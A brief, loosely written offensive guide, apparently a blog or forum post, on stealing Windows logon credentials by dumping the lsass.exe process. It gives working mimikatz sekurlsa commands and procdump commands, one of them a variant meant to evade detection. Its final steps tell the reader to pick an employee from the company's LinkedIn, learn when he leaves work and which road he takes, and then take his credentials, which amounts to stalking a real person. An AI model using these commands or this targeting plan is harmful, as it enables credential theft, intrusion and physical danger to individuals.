First OF all, Create a minidump of the lsass.exe using task manager (must be running as administrator):
Second , Swtich mimikatz context to the minidump:
sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP sekurlsa::logonpasswords
Now it's a time for Procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
// or avoid reading lsass by dumping a cloned lsass process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
After doing all of the above steps, you need to do the following steps:
1- try to figure the needed employee from Linkedin profile of the company
2- try to know when the employee will leave the work and which road he will take
3- use this technique to get his creds
PS : all screen shots are from https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz